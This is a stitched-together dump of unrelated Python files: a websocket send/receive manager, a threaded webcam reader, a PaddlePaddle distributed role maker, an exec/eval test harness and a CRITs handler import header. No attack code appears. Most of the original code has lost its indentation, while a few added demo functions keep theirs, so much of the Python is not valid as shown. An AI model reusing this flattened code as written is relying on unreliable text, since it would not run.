self.ws.on_open = on_socket_open
self.ws.run_forever(ping_interval=8 * self.PING_RATE)
self._ensure_closed()
except Exception as e:
shared_utils.print_and_log(
logging.WARN,
'Socket error {}, attempting restart'.format(repr(e)),
)
time.sleep(0.2)
# Start listening thread
self.listen_thread = threading.Thread(
target=run_socket, name='Main-Socket-Recv-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
time.sleep(1.2)
start_time = time.time()
while not self.alive:
if time.time() - start_time > self.DEF_DEAD_TIME:
self.server_death_callback()
raise ConnectionRefusedError( # noqa F821 we only support py3
'Was not able to establish a connection with the server, '
                    'please try to run again. If that fails, '
'please ensure that your local device has the correct SSL '
'certs installed.'
)
try:
self._send_world_alive()
except Exception:
pass
time.sleep(self.PING_RATE / 2)
# Start sending thread
self.send_thread = threading.Thread(
target=self.channel_thread, name='Main-Socket-Send-Thread'
)
self.send_thread.daemon = True
self.send_thread.start()
def channel_thread(self):
"""Handler thread for monitoring all channels"""
# while the thread is still alive
while not self.is_shutdown:
if self.ws is None:
# Waiting for websocket to come back alive
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
continue
self._try_send_world_ping()
try:
# Get first item in the queue, check if can send it yet
item = self.sending_queue.get(block=False)
t = item[0]
if time.time() < t:
# Put the item back into the queue,
# it's not time to pop yet
self.sending_queue.put(item)
else:
# Try to send the packet
packet = item[1]
if not packet:
# This packet was deleted out from under us
continue
if packet.status is not Packet.STATUS_SENT:
# either need to send initial packet
# or resend after a failed send
self._send_packet(packet, t)
except Empty:
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
except Exception as e:
shared_utils.print_and_log(
logging.WARN,
'Unexpected error occurred in socket handling thread: '
'{}'.format(repr(e)),
should_print=True,
)
    # Individual channel accessors are useful for testing
def open_channel(self, worker_id, assignment_id):
"""Opens a channel for a worker on a given assignment, doesn't re-open
if the channel is already open."""
connection_id = '{}_{}'.format(worker_id, assignment_id)
self.open_channels.add(connection_id)
self.worker_assign_ids[connection_id] = (worker_id, assignment_id)
def close_channel(self, connection_id):
"""Closes a channel by connection_id"""
shared_utils.print_and_log(
logging.DEBUG, 'Closing channel {}'.format(connection_id)
)
if connection_id in self.open_channels:
self.open_channels.remove(connection_id)
with self.packet_map_lock:
packet_ids = list(self.packet_map.keys())
# Clear packets associated with this sender
for packet_id in packet_ids:
packet = self.packet_map[packet_id]
packet_conn_id = packet.get_receiver_connection_id()
if connection_id == packet_conn_id:
del self.packet_map[packet_id]
def close_all_channels(self):
"""Closes all channels by clearing the list of channels"""
shared_utils.print_and_log(logging.DEBUG, 'Closing all channels')
connection_ids = list(self.open_channels)
for connection_id in connection_ids:
self.close_channel(connection_id)
def socket_is_open(self, connection_id):
return connection_id in self.open_channels
def queue_packet(self, packet):
"""Queues sending a packet to its intended owner"""
shared_utils.print_and_log(
logging.DEBUG, 'Put packet ({}) in queue'.format(packet.id)
)
# Get the current time to put packet into the priority queue
with self.packet_map_lock:
self.packet_map[packet.id] = packet
item = (time.time(), packet)
self.sending_queue.put(item)
return True
def get_status(self, packet_id):
"""Returns the status of a particular packet by id"""
with self.packet_map_lock:
if packet_id not in self.packet_map:
return Packet.STATUS_NONE
return self.packet_map[packet_id].status
def shutdown(self):
"""marks the socket manager as closing, shuts down all channels"""
self.is_shutdown = True
self.close_all_channels()
self.keep_running = False
self._ensure_closed()
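# A minimal, self-contained sketch (not from the original module) of the
# delayed-send queue pattern used by channel_thread above: items are queued as
# (send_time, payload) tuples and re-queued until their send time arrives.
# Names and timings here are illustrative only.
def _delayed_send_queue_demo():
    import time
    from queue import Queue, Empty

    sending_queue = Queue()
    sending_queue.put((time.time() + 0.5, 'hello'))  # deliver ~0.5s from now
    deadline = time.time() + 2.0
    while time.time() < deadline:
        try:
            send_time, payload = sending_queue.get(block=False)
            if time.time() < send_time:
                # Not time to send yet; put the item back and keep polling.
                sending_queue.put((send_time, payload))
            else:
                print('sending', payload)
                break
        except Empty:
            pass
        time.sleep(0.05)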
|
WebcamVideoStream.py
|
# import the necessary packages
from threading import Thread
import cv2
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
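# Example usage sketch (not part of the class above): read frames from the
# threaded stream and display them until 'q' is pressed. Requires a working
# webcam and an OpenCV build with GUI support.
if __name__ == '__main__':
    vs = WebcamVideoStream(src=0).start()
    try:
        while True:
            frame = vs.read()
            if frame is None:
                continue
            cv2.imshow('Frame', frame)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
    finally:
        vs.stop()
        cv2.destroyAllWindows()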
|
role_maker.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of Role Makers."""
import os
import time
import numpy as np
import warnings
from multiprocessing import Process, Manager
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
class Role:
WORKER = 1
SERVER = 2
HETER_WORKER = 3
ALL = 4
class Gloo(object):
"""
Gloo is a universal class for barrier and collective communication
"""
class RENDEZVOUS:
HDFS = 1
FILE = 2
HTTP = 3
def __init__(self):
self._worker_comm = None
self._server_comm = None
self._nodes_comm = None
self._comm_world = ["worker", "server", "all"]
self._err_init = "gloo is not initialized, will not communicator with other nodes"
self._err_type = "gloo initialized error, please check arguments"
self._err_world = "argument error, comm_world must in {}".format(
self._comm_world)
self._is_initialized = False
self._init_timeout_seconds = 3600
self._run_timeout_seconds = 9999999
self._rendezvous = None
self._role = None
self._iface = None
self._role_id = -1
self._worker_num = -1
self._server_num = -1
self._need_init_all = False
def init(self,
rendezvous,
role,
role_id,
worker_num,
server_num,
need_init_all=False,
kwargs=None):
self._rendezvous = rendezvous
self._role = role
self._role_id = role_id
self._worker_num = worker_num
self._server_num = server_num
self._need_init_all = need_init_all
self._iface = ""
self._prefix = kwargs.get("store.prefix", "")
http_server = None
if self._rendezvous == Gloo.RENDEZVOUS.HDFS:
dfs_name = kwargs.get("dfs.name", "")
dfs_ugi = kwargs.get("dfs.ugi", "")
dfs_path = kwargs.get("dfs.path", "")
if not dfs_name or not dfs_ugi or not dfs_path:
raise ValueError(self._err_type)
self._init_dfs(dfs_name, dfs_ugi, dfs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.FILE:
fs_path = kwargs.get("dfs.path", "")
if not fs_path:
raise ValueError(self._err_type)
self._init_fs(fs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.HTTP:
ip = kwargs.get("http.host", "")
port = kwargs.get("http.port", "")
start_http_server = kwargs.get("start_http_server", False)
http_server_d = kwargs.get("http_server_d")
if not ip or not port:
raise ValueError(self._err_type)
http_server = self._init_http(ip, port, self._prefix,
start_http_server, http_server_d)
else:
raise ValueError(self._err_type)
self._is_initialized = True
self._http_server = http_server
def _init_fs(self, fs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(fs_path, role), "", "")
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_dfs(self, dfs_name, dfs_ugi, dfs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(dfs_path, role), dfs_name, dfs_ugi)
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_http(self, ip, port, prefix, start_http_server, http_server_d):
def __start_kv_server(http_server_d, size_d):
print("start http_server: {}, {}".format(port, size_d))
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(port, size_d)
http_server.start()
wait_seconds = 5
while http_server_d.get("running",
False) or not http_server.should_stop():
time.sleep(wait_seconds)
http_server.stop()
def init_kv_server(http_server_d):
worker_key = prefix + '_' + 'worker'
size_d = {worker_key: self._worker_num, }
print("worker_key:{}, size: {}".format(worker_key, size_d))
http_server_d["running"] = True
# child process for http server
_http_server = Process(
target=__start_kv_server, args=(http_server_d, size_d))
_http_server.daemon = True
# set running status to True
# start child process
_http_server.start()
return _http_server
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_http_store(ip, port, 'worker')
ep = ":".join([ip, str(port)])
wait_server_ready([ep])
gloo.init()
return gloo
port = int(port)
if start_http_server:
print("to start http_server")
http_server = init_kv_server(http_server_d)
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
# TODO (sandyhouse): initialize gloo for server and all
if start_http_server:
http_server_d["running"] = False
http_server.join()
def _get_rank_nodes(self, role):
nodes = 0
rank = -1
if role == Role.WORKER:
nodes = self._worker_num
rank = self._role_id
elif role == Role.SERVER:
nodes = self._server_num
rank = self._role_id
elif role == Role.ALL:
nodes = self._worker_num + self._server_num
if self._role == Role.WORKER:
rank = self._role_id
else:
rank = self._worker_num + self._role_id
else:
            raise ValueError(self._err_type)
return rank, nodes
def __get_default_iface(self):
"""
get default physical interface
"""
default1 = self.__get_default_iface_from_gateway()
default2 = self.__get_default_iface_from_interfaces()
return default2 if default1 == "lo" else default1
def __get_default_iface_from_gateway(self):
"""
get default physical interface
"""
res = os.popen("route -A inet").read().strip().split("\n")
gateway_idx = None
iface_idx = None
for item in res:
item = item.split()
if "Gateway" in item and "Iface" in item:
gateway_idx = item.index("Gateway")
iface_idx = item.index("Iface")
elif gateway_idx != None and iface_idx != None:
gateway = None
if len(item) > gateway_idx:
gateway = item[gateway_idx]
if gateway and gateway != '*' and gateway != "0.0.0.0" and len(
item) > iface_idx:
return item[iface_idx]
return "lo"
def __get_default_iface_from_interfaces(self):
"""
get default physical interface
"""
res = os.popen("ip -f inet addr | awk NR%3==1").read().strip().split(
"\n")
for item in res:
if "BROADCAST" in item:
return item.split(":")[1].strip()
return "lo"
def barrier(self, comm_world):
"""
        barrier among all nodes in the given comm_world
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
self._worker_comm.barrier()
elif comm_world == "server":
self._server_comm.barrier()
else:
self._nodes_comm.barrier()
def all_reduce(self, input, mode="sum", comm_world="worker"):
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
input = np.array(input)
input_shape = input.shape
input_list = input.reshape(-1).tolist()
self.barrier(comm_world)
if comm_world == "worker":
ans = self._worker_comm.all_reduce(input_list, mode)
elif comm_world == "server":
ans = self._server_comm.all_reduce(input_list, mode)
else:
ans = self._nodes_comm.all_reduce(input_list, mode)
output = np.array(ans).reshape(input_shape)
return output
def all_gather(self, input, comm_world="worker"):
"""
        all-gather the input across the given comm_world
        Args:
            input(any): object to gather from every node
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
output = self._worker_comm.all_gather(input)
elif comm_world == "server":
output = self._server_comm.all_gather(input)
else:
output = self._nodes_comm.all_gather(input)
return output
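# Pure-numpy illustration (not part of the Gloo class) of the reshape dance in
# all_reduce above: the input is flattened to a 1-D list before the collective
# call and the result is reshaped back to the original shape afterwards. The
# element-wise sum below stands in for the real gloo all_reduce.
def _all_reduce_reshape_demo():
    a = np.array([[1, 2], [3, 4]])
    b = np.array([[10, 20], [30, 40]])
    flat_a, flat_b = a.reshape(-1).tolist(), b.reshape(-1).tolist()
    reduced = [x + y for x, y in zip(flat_a, flat_b)]  # "sum" mode
    out = np.array(reduced).reshape(a.shape)
    print(out)  # [[11 22] [33 44]]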
class RoleMakerBase(object):
"""
RoleMakerBase is a base class for assigning a role to current process
in distributed training.
A paddle developer can implement RoleMakerBase to design a role maker
for worker or pserver assignment.
"""
def __init__(self):
self._worker_endpoints = []
self._server_endpoints = []
self._role_is_generated = False
self._role = None
self._current_id = -1
# for heter parameter server mode
self._heter_trainer_endpoints = []
self._heter_trainer_device = "CPU"
self._is_heter_parameter_server_mode = False
def _is_worker(self):
"""
return is_worker() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_server(self):
"""
return is_server() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_first_worker(self):
"""
Check whether the node is the first instance of worker.
Returns:
bool: True if this is the first node of worker,
False if not.
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_num(self):
"""
Get current total worker number.
Returns:
int: worker number
"""
raise NotImplementedError("Please implement this method in child class")
def _server_num(self):
"""
Get current total server number.
Returns:
int: server number
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_index(self):
"""
Get current worker id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _server_index(self):
"""
Get current server id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _role_id(self):
"""
Get current id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _node_num(self):
"""
Get the training node number
Returns:
int: node num
"""
raise NotImplementedError("Please implement this method in child class")
def _get_trainer_endpoints(self):
"""
return trainer endpoints
"""
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
return pserver endpoints
"""
return self._server_endpoints
def to_string(self):
return "role: {}, current_id: {}, worker_endpoints: {}, server_endpoints: {}".format(
self._role, self._current_id, self._worker_endpoints,
self._server_endpoints)
def _all_gather(self, input, comm_world="worker"):
print("warning: RoleMakerBase does not have all gather worker.")
return None
def _all_reduce(self, input, mode="sum", comm_world="worker"):
"""
Args:
input(list/numpy.array): array of one dim
output(list/numpy.array): array of one dim
mode(str): "sum" or "min" or "max"
"""
print("warning: RoleMakerBase does not have all reduce worker.")
return None
def _barrier(self, comm_world):
"""
barrier between trainers if current role is TRAINER
"""
print("warning: RoleMakerBase does not have barrier worker.")
def _is_heter_worker(self):
"""
Return is_heter_worker() of current process
"""
warnings.warn("RoleMakerBase does not have function: _is_heter_worker.")
return False
def _heter_worker_num(self):
"""
Get current total heter-worker number.
Returns:
int: heter_worker number
"""
warnings.warn(
"RoleMakerBase does not have function: _heter_worker_num.")
return 0
def _get_heter_worker_endpoints(self):
"""
Returns:
            string: all heter_trainers' endpoints
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints
def _get_heter_worker_endpoint(self):
"""
Returns:
int: corresponding heter_trainer's endpoint
e.g: if we have 4 cpu-trainer(default), 2 gpu-trainer(heter)
then No.0 and No.2 cpu-trainer will work with No.0 gpu-trainer
and No.1 and No.3 cpu-trainer will work with No.1 gpu-trainer
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints[(self._current_id) %
self._heter_worker_num()]
class PaddleCloudRoleMaker(RoleMakerBase):
def __init__(self, is_collective=False, **kwargs):
super(PaddleCloudRoleMaker, self).__init__()
self._is_collective = is_collective
self._non_distributed = False
self._kwargs = kwargs
self._role_is_generated = False
self._server_endpoints = []
self._worker_endpoints = []
self._gloo = Gloo() # gloo instance
def _barrier(self, comm_world):
self._gloo.barrier(comm_world)
def _all_gather(self, input, comm_world="worker"):
return self._gloo.all_gather(input, comm_world)
def _all_reduce(self, input, mode="sum", comm_world="worker"):
return self._gloo.all_reduce(input, mode, comm_world)
def _is_worker(self):
"""
whether current process is worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER
def _is_server(self):
"""
whether current process is server
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.SERVER
def _is_first_worker(self):
"""
whether current process is worker of rank 0
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER and self._current_id == 0
def _worker_index(self):
"""
get index of current worker
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _server_index(self):
"""
get index of current server
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _role_id(self):
"""
get index of current node
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _worker_num(self):
"""
        return the current number of workers
"""
if not self._role_is_generated:
self._generate_role()
return self._trainers_num
def _server_num(self):
"""
return the current number of server
"""
if not self._role_is_generated:
self._generate_role()
return len(self._get_pserver_endpoints(
)) if self._get_pserver_endpoints() is not None else 0
def _node_num(self):
"""
return the training node number
"""
if not self._role_is_generated:
self._generate_role()
return self._nodes_num
def _get_node_num(self):
"""
return the training node number
"""
if not self._role_is_generated:
self._generate_role()
return self._nodes_num
def _get_local_rank(self):
if not self._role_is_generated:
self._generate_role()
return self._local_rank
def _get_local_device_ids(self):
if not self._role_is_generated:
self._generate_role()
return self._local_device_ids
def _get_world_device_ids(self):
if not self._role_is_generated:
self._generate_role()
return self._world_device_ids
def _get_trainer_endpoints(self):
"""
get endpoint of all trainers
"""
if not self._role_is_generated:
self._generate_role()
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
get endpoint of all pservers
"""
if not self._role_is_generated:
self._generate_role()
return self._server_endpoints
def _is_non_distributed(self):
"""
        Return True if the environment variables required by fleetrun are not found
        (i.e. the code was launched directly with python rather than with fleetrun)
"""
if not self._role_is_generated:
self._generate_role()
return self._non_distributed
def _heter_worker_num(self):
"""
get heter worker nums
"""
if not self._role_is_generated:
self._generate_role()
return self._heter_trainers_num
def _is_heter_worker(self):
"""
whether current process is heter worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.HETER_WORKER
def _ps_env(self):
# Environment variable PADDLE_PSERVERS_IP_PORT_LIST must be set
# format: string(ip:port,ip:port), eg. 127.0.0.1:6001,127.0.0.1:6002
self._server_endpoints = os.getenv("PADDLE_PSERVERS_IP_PORT_LIST", None)
if self._server_endpoints is None:
# back to non_distributed execution.
self._server_endpoints = ""
self._trainers_num = 1
self._role = Role.WORKER
self._current_id = 0
self._nodes_num = 1
self._heter_trainers_num = 0
self._heter_trainer_endpoints = None
self._non_distributed = True
return
self._server_endpoints = self._server_endpoints.split(",")
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS", None)
if self._worker_endpoints != None:
self._worker_endpoints = self._worker_endpoints.split(",")
else:
self._worker_endpoints = []
trainers_num = os.getenv("PADDLE_TRAINERS_NUM", None)
if trainers_num == None:
raise ValueError(
"Can not find PADDLE_TRAINERS_NUM, please check your environment."
)
trainers_num = int(trainers_num)
training_role = os.getenv("TRAINING_ROLE", None)
if training_role == None:
raise ValueError(
"Can not find TRAINING_ROLE, please check your environment.")
if training_role not in ["TRAINER", "PSERVER", "HETER_TRAINER"]:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER, but get {}, please check your environment.".
format(training_role))
# For heter parameter server env setting
heter_trainer_eplist = os.getenv("PADDLE_HETER_TRAINER_IP_PORT_LIST",
"")
if heter_trainer_eplist != "":
try:
heter_trainer_eplist = os.environ[
"PADDLE_HETER_TRAINER_IP_PORT_LIST"].split(",")
except:
raise ValueError(
"Can not Find PADDLE_HETER_TRAINER_IP_PORT_LIST in env or its format doesn't match the requirement: 'IP:PORT,IP:PORT' ."
)
self._is_heter_parameter_server_mode = True
heter_trainers_num = len(heter_trainer_eplist)
else:
self._is_heter_parameter_server_mode = False
heter_trainers_num = 0
if training_role == "TRAINER":
role = Role.WORKER
current_id = os.getenv("PADDLE_TRAINER_ID", None)
if current_id == None:
raise ValueError(
"Can not find PADDLE_TRAINER_ID, please check your environment."
)
current_id = int(current_id)
if len(self._worker_endpoints) > 0:
self._cur_endpoint = self._worker_endpoints[current_id]
elif training_role == "PSERVER":
role = Role.SERVER
port = os.getenv("PADDLE_PORT", None)
if port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
ip = os.getenv("POD_IP", None)
if ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
self._cur_endpoint = ip + ":" + port
current_id = self._server_endpoints.index(self._cur_endpoint)
elif training_role == "HETER_TRAINER":
role = Role.HETER_WORKER
cur_port = os.getenv("PADDLE_PORT", None)
if cur_port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
cur_ip = os.getenv("POD_IP", None)
if cur_ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
curr_endpoint = ":".join([cur_ip, cur_port])
current_id = heter_trainer_eplist.index(curr_endpoint)
self._trainers_num = trainers_num
self._role = role
self._current_id = current_id
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._heter_trainers_num = heter_trainers_num
self._heter_trainer_endpoints = heter_trainer_eplist
def _collective_env(self):
self._current_id = int(os.getenv("PADDLE_TRAINER_ID", "0"))
self._training_role = os.getenv("PADDLE_TRAINING_ROLE", "TRAINER")
assert (self._training_role == "TRAINER")
self._role = Role.WORKER
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
self._cur_endpoint = os.getenv("PADDLE_CURRENT_ENDPOINT")
if self._worker_endpoints is None:
# back to non_distributed execution.
self._worker_endpoints = "127.0.0.1:6170"
self._cur_endpoint = self._worker_endpoints
self._non_distributed = True
self._worker_endpoints = self._worker_endpoints.split(",")
self._trainers_num = len(self._worker_endpoints)
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._local_rank = os.getenv("PADDLE_RANK_IN_NODE")
self._local_device_ids = os.getenv("PADDLE_LOCAL_DEVICE_IDS")
self._world_device_ids = os.getenv("PADDLE_WORLD_DEVICE_IDS")
def _gloo_init(self):
# PADDLE_WITH_GLOO 1: trainer barrier, 2: all barrier
use_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
if use_gloo not in [1, 2]:
return
# PADDLE_GLOO_RENDEZVOUS 1: HDFS 2: FILE 3: HTTP
rendezvous_type = int(os.getenv("PADDLE_GLOO_RENDEZVOUS", "0"))
prefix = os.getenv("SYS_JOB_ID", "")
if rendezvous_type not in [
Gloo.RENDEZVOUS.HDFS, Gloo.RENDEZVOUS.HTTP, Gloo.RENDEZVOUS.FILE
]:
raise ValueError(self._gloo._err_type)
need_init_all = True if use_gloo == 2 else False
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
dfs_name = os.getenv("PADDLE_GLOO_FS_NAME", "")
dfs_ugi = os.getenv("PADDLE_GLOO_FS_UGI", "")
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.name": dfs_name,
"dfs.ugi": dfs_ugi,
"dfs.path": dfs_path,
"store.prefix": prefix,
}
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
start_http_server = False
manager = Manager()
http_server_d = manager.dict()
http_server_d["running"] = False
if self._is_collective:
ep_rank_0 = self._worker_endpoints[0]
if self._is_first_worker():
start_http_server = True
else:
ep_rank_0 = os.getenv("PADDLE_GLOO_HTTP_ENDPOINT", "")
if self._is_server() and self._server_index() == 0:
start_http_server = True
ip, port = ep_rank_0.split(':')
kwargs = {
"http.host": ip,
"http.port": port,
"store.prefix": prefix,
'start_http_server': start_http_server,
'http_server_d': http_server_d,
}
else:
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.path": dfs_path,
"store.prefix": prefix,
}
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
type = "HDFS"
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
type = "HTTP"
else:
type = "FILE"
print("Gloo init with {}: need_init_all: {}, args: {}".format(
type, need_init_all, kwargs))
self._gloo.init(
rendezvous=rendezvous_type,
role=self._role,
role_id=self._role_id(),
worker_num=self._worker_num(),
server_num=self._server_num(),
need_init_all=need_init_all,
kwargs=kwargs)
if rendezvous_type == Gloo.RENDEZVOUS.HTTP:
http_server_d['running'] = False
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._ps_env()
else:
self._collective_env()
self._role_is_generated = True
if not paddle.fluid.framework.in_dygraph_mode():
self._gloo_init()
class UserDefinedRoleMaker(PaddleCloudRoleMaker):
def __init__(self, is_collective=False, init_gloo=False, **kwargs):
super(UserDefinedRoleMaker, self).__init__(
is_collective=is_collective, init_gloo=init_gloo, **kwargs)
self._init_gloo = init_gloo
def _user_defined_ps_env(self):
self._server_endpoints = self._kwargs.get("server_endpoints")
self._worker_endpoints = self._kwargs.get("worker_endpoints", [])
self._trainers_num = self._kwargs.get("worker_num", 0)
if self._trainers_num == 0:
assert (len(self._worker_endpoints) > 0)
self._trainers_num = len(self._worker_endpoints)
self._role = self._kwargs.get("role")
self._current_id = self._kwargs.get("current_id")
if self._role == Role.WORKER and len(
self._worker_endpoints) > self._current_id:
self._cur_endpoint = self._worker_endpoints[self._current_id]
elif self._role == Role.SERVER:
self._cur_endpoint = self._server_endpoints[self._current_id]
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _user_defined_collective_env(self):
self._worker_endpoints = self._kwargs.get("worker_endpoints")
self._current_id = self._kwargs.get("current_id")
self._trainers_num = len(self._worker_endpoints)
self._training_role = Role.WORKER
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._user_defined_ps_env()
else:
self._user_defined_collective_env()
self._role_is_generated = True
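# Usage sketch (not part of the original file): drive PaddleCloudRoleMaker in
# parameter-server mode by setting the environment variables that _ps_env()
# reads. Addresses and ids below are placeholders for a local single-node run
# and assume PaddlePaddle is installed.
def _role_maker_env_demo():
    os.environ["PADDLE_PSERVERS_IP_PORT_LIST"] = "127.0.0.1:6001"
    os.environ["PADDLE_TRAINER_ENDPOINTS"] = "127.0.0.1:6170"
    os.environ["PADDLE_TRAINERS_NUM"] = "1"
    os.environ["TRAINING_ROLE"] = "TRAINER"
    os.environ["PADDLE_TRAINER_ID"] = "0"
    role_maker = PaddleCloudRoleMaker(is_collective=False)
    print(role_maker._is_worker())     # True  (TRAINING_ROLE=TRAINER)
    print(role_maker._worker_index())  # 0     (PADDLE_TRAINER_ID)
    print(role_maker._worker_num())    # 1     (PADDLE_TRAINERS_NUM)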
|
process_tester.py
|
import multiprocessing
def tester(command_q, result_q):
while True:
op, cmd = command_q.get()
try:
if op == 'terminate':
break
if op == 'exec':
exec(cmd)
result_q.put((0, None))
if op == 'eval':
res = eval(cmd)
result_q.put((0, res))
except Exception as e:
result_q.put((1, e))
class Tester:
def __enter__(self):
self.command_q = multiprocessing.Queue()
self.result_q = multiprocessing.Queue()
self.p = multiprocessing.Process(target=tester, args=(self.command_q, self.result_q))
self.p.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.command_q.put(('terminate', ''))
self.command_q.close()
self.result_q.close()
# self.p.join() TODO
def exec(self, command, timeout=1):
self.command_q.put(('exec', command))
exception, res = self.result_q.get(timeout=timeout)
if exception:
raise res
def eval(self, command, timeout=1):
self.command_q.put(('eval', command))
exception, res = self.result_q.get(block=True, timeout=timeout)
if exception:
self.close()
raise res
else:
return res
def close(self):
self.command_q.put(('terminate', ''))
self.command_q.close()
self.result_q.close()
self.p.join()
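# Example usage sketch (not part of the original file): run code in a child
# process so a crash or hang there cannot take down the caller. Note that
# __exit__ above does not join the child, so it may linger briefly on exit.
if __name__ == '__main__':
    with Tester() as t:
        t.exec("print('hello from the child process')")
        print(t.eval('2 + 2'))  # 4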
|
handlers.py
|
import ast
import datetime
import json
import logging
import copy
from django.http import HttpResponse
from multiprocessing import Process
from threading import Thread, local
try:
from mongoengine.base import ValidationError
except ImportError:
from mongoengine.errors import ValidationError
from multiprocessing.pool import Pool, ThreadPool
from django.core.urlresolvers import reverse
from django.conf import settings
from django.shortcuts import render_to_response
from django.template import RequestContext
import crits.services
from crits.core.class_mapper import class_from_type, class_from_id
from crits.core.crits_mongoengine import json_handler
from crits.core.handlers import build_jtable, csv_export
from crits.core.handlers import jtable_ajax_list, jtable_ajax_delete
